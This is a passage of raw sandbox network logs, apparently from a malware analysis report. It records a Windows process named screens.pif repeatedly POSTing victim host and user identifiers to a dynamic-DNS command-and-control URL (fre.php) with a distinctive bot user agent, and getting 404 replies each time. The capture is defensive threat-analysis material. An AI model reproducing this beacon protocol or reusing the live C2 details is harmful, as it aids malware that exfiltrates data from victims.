Oct 3, 2024 09:22:08.044234991 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.10	49776	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:08.189498901 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:08.197129965 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:09.291960001 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.10	49777	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:09.444485903 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:09.449762106 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:10.319149017 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.10	49778	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:10.494740963 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:10.502964020 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:11.227679968 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.10	49779	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:11.384141922 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:11.390993118 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:12.130454063 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.10	49780	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:12.284667015 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:12.289772987 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:13.082750082 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:12 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.10	49781	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:13.250464916 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:13.260240078 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:14.029635906 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.10	49782	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:14.177622080 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:14.183320045 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:15.259773016 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.10	49783	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:15.419401884 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:15.428230047 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:16.293493032 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.10	49784	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:16.448915005 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:16.459229946 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:18.382441044 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:17 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.10	49785	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:18.535527945 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:18.541296005 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:19.163856983 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.10	49786	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:19.318485975 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:19.323390961 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:19.984327078 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.10	49787	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:20.140371084 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:20.145363092 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:20.837774992 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.10	49788	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:20.987117052 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:20.992218018 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:21.745456934 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.10	49789	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:21.894581079 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:21.900605917 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:22.564635992 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.10	49790	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:22.725519896 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:22.731443882 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:23.426518917 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.10	49791	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:23.585536003 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:23.590473890 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:24.372764111 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.10	49792	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:24.513129950 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:24.518059969 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:25.207048893 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.10	49793	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:25.363157988 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:25.368288040 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:26.051245928 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.10	49794	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:26.202344894 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:26.207257986 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:26.870814085 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.10	49795	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:27.017453909 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:27.022465944 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:27.946026087 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.10	49796	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:28.112184048 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:22:28.117331028 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:28.768294096 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.10	49797	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:28.922904015 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
